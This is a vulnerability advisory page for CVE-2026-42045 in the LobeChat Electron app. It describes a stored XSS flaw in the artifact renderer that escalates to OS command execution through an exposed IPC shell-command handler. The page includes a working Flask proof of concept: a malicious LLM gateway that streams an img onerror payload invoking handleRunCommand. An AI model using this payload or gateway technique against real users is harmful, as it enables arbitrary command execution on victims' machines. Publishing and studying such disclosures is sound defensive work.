Skip to main content

LobeChat CVE-2026-42045

MEDIUM
OS Command Injection (CWE-78)
2026-05-05 https://github.com/lobehub/lobehub
6.2
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.2 MEDIUM
AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
High
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
May 05, 2026 - 19:00 vuln.today
Analysis Generated
May 05, 2026 - 19:00 vuln.today

DescriptionGitHub Advisory

Summary

The vulnerability was automatically discovered by an ai agent and then manually verified.

LobeChat's message rendering mechanism has a stored cross-site scripting (XSS) vulnerability. Combined with the Electron main process's exposed insecure IPC interface, attackers can construct malicious payloads to achieve an attack chain from XSS to remote code execution (RCE).

The LobeChat team verified this vulnerability in lobehub v2.1.23, and it also exists in the latest version.

Details

When LobeChat processes custom tags in the Render process of src/features/Portal/Artifacts/Body/Renderer/index.tsx, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering.

typescript
const Renderer = memo<{ content: string; type?: string }>(({ content, type }) => {
  switch (type) {
    case 'application/lobe.artifacts.react': {
      return <ReactRenderer code={content} />;
    }

    case 'image/svg+xml': {
      return <SVGRender content={content} />;
    }

    case 'application/lobe.artifacts.mermaid': {
      return <Mermaid variant={'borderless'}>{content}</Mermaid>;
    }

    case 'text/markdown': {
      return <Markdown style={{ overflow: 'auto' }}>{content}</Markdown>;
    }

    default: {
      return <HTMLRenderer htmlContent={content} />;
    }
  }
});

export default Renderer;

If an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side.

Additionally, Lobechat's Electron main process exposes an IPC interface called runCommand, used to invoke system commands. This interface allows arbitrary command execution and does not filter the command parameter. Therefore, if an attacker can obtain a handle to window.parent.electronAPI via XSS and call the runCommand method of the IPC, the ipcMain process can execute arbitrary system commands with the current user's privileges.

typescript
  @IpcMethod()
  async handleRunCommand({
    command,
    description,
    run_in_background,
    timeout = 120_000,
  }: RunCommandParams): Promise<RunCommandResult> {
    ...
    const childProcess = spawn(shellConfig.cmd, shellConfig.args, {
            env: process.env,
            shell: false,
          });
    ...
  }

PoC

The attacker launched a malicious OpenAI gateway on port 5001

python
from flask import Flask, Response, request, jsonify
import time
import json

app = Flask(__name__)
fake_api_key = "sk-test"

@app.route('/v1/chat/completions', methods=['POST', 'OPTIONS'])
def chat_completions():
    if request.method == 'OPTIONS':
        return Response(status=200, headers={
            'Access-Control-Allow-Origin': '*',
            'Access-Control-Allow-Headers': '*'
        })
# Check for API Key
    auth_header = request.headers.get('Authorization')
    print(auth_header)
    if not auth_header or auth_header != f'Bearer {fake_api_key}':
        return jsonify({"error": {"message": "Invalid API Key", "type": "invalid_request_error", "code": "invalid_api_key"}}), 401

    def generate():
        payload = """
<lobeArtifact type="nebula">
<img src=x onerror='window.parent.electronAPI.invoke("shellCommand.handleRunCommand", {command:"open -a Calculator"})'>
</lobeArtifact>
"""
# Split payload into chunks to simulate streaming
        chunks = [payload[i:i+10] for i in range(0, len(payload), 10)]

        for chunk in chunks:
            data = {
                "id": "chatcmpl-hpdoger-123",
                "object": "chat.completion.chunk",
                "created": int(time.time()),
                "model": "gpt-3.5-turbo",
                "choices": [{
                    "index": 0,
                    "delta": {"content": chunk},
                    "finish_reason": None
                }]
            }
            yield f"data: {json.dumps(data)}\n\n"
            time.sleep(0.1)
# End of stream
        final_data = {
            "id": "chatcmpl-hpdoger-123",
            "object": "chat.completion.chunk",
            "created": int(time.time()),
            "model": "gpt-3.5-turbo",
            "choices": [{
                "index": 0,
                "delta": {},
                "finish_reason": "stop"
            }]
        }
        yield f"data: {json.dumps(final_data)}\n\n"
        yield "data: [DONE]\n\n"

    return Response(generate(), mimetype='text/event-stream', headers={
        'Access-Control-Allow-Origin': '*',
        'Access-Control-Allow-Headers': '*'
    })

@app.route('/v1/models', methods=['GET'])
def models():
    return jsonify({
        "object": "list",
        "data": [{
            "id": "gpt-3.5-turbo",
            "object": "model",
            "created": 1677610602,
            "owned_by": "openai"
        }]
    })

if __name__ == '__main__':
    print("Evil OpenAI-compatible server running on http://127.0.0.1:5001")
    app.run(port=5001, debug=True)

The victim opens the LobeChat application and configures an LLM Provider, entering the address of the HTTP server provided by the attacker.

<img width="2048" height="772" alt="image" src="https://github.com/user-attachments/assets/86fe8f76-d75f-4e23-a2c5-fe29b124c7a7" />

The victim was exposed to an arbitrary command execution vulnerability while chatting

<img width="2048" height="1036" alt="image" src="https://github.com/user-attachments/assets/0a84171f-ec78-4166-b7ab-298ece6b06b9" />

reproduction

For attack reproduction, refer to this video. Once the victim configures the attacker's LLM provider endpoint, arbitrary commands can be executed. Here, our demonstration opens a calculator in the victim's environment.

https://github.com/user-attachments/assets/6383e996-9148-4e88-8e25-90260104368d

Impact

Affected LobeChat clients can connect to the attacker's LLM endpoint and trigger arbitrary command execution simply by sending normal conversation messages.

Patch

A patch is available at https://github.com/lobehub/lobehub/releases/tag/v2.1.48.

AnalysisAI

Stored XSS in LobeChat's message rendering escalates to remote code execution via exposed Electron IPC when victims configure an attacker-controlled LLM provider endpoint. The vulnerability chains unfiltered HTML rendering with an unauthenticated shellCommand IPC handler that executes arbitrary system commands at user privilege level. Confirmed in versions up to 2.1.26; patch released in v2.1.48. Public proof-of-concept demonstrates opening arbitrary applications via malicious LLM API responses.

Technical ContextAI

LobeChat is an Electron-based AI chat application that renders LLM responses through a custom rendering pipeline. The vulnerability involves two distinct components: First, the Renderer process in src/features/Portal/Artifacts/Body/Renderer/index.tsx uses a switch statement to handle artifact types; when the type parameter doesn't match known cases (react, svg, mermaid, markdown), it falls through to a default HTMLRenderer that directly renders untrusted content as HTML without sanitization. Second, the Electron main process exposes an IPC interface (shellCommand.handleRunCommand) that accepts a command parameter and spawns it via the system shell without input validation or filtering. The CWE-78 (OS Command Injection) root cause stems from the combination of unsanitized user input flowing from the XSS payload through the IPC boundary into a spawn() call. The attack vector leverages the Electron bridge (window.parent.electronAPI) which provides inter-process communication from the sandboxed renderer to the main process.

RemediationAI

Upgrade LobeChat to version 2.1.48 or later if available in your package distribution. Verify the patched version is installed via npm list @lobehub/lobehub. For users unable to immediately patch, implement the following compensating controls with their respective trade-offs: (1) Restrict LLM provider configuration to a hardcoded allowlist of official providers (e.g., OpenAI, Anthropic official endpoints only)-side effect is loss of flexibility for users who need custom LLM endpoints; (2) Disable the Electron app's IPC handler for shellCommand.handleRunCommand at the system level by modifying the application's preload script if source code access is available-side effect may disable legitimate features that depend on shell command execution; (3) Run LobeChat in a restricted user account with minimal file system and network permissions-side effect limits application functionality and requires additional system configuration. Monitor the official GitHub repository (https://github.com/lobehub/lobehub/releases) and NPM package for v2.1.48+ confirmation that it is released and fully addresses both XSS and IPC exposure.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-42045 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy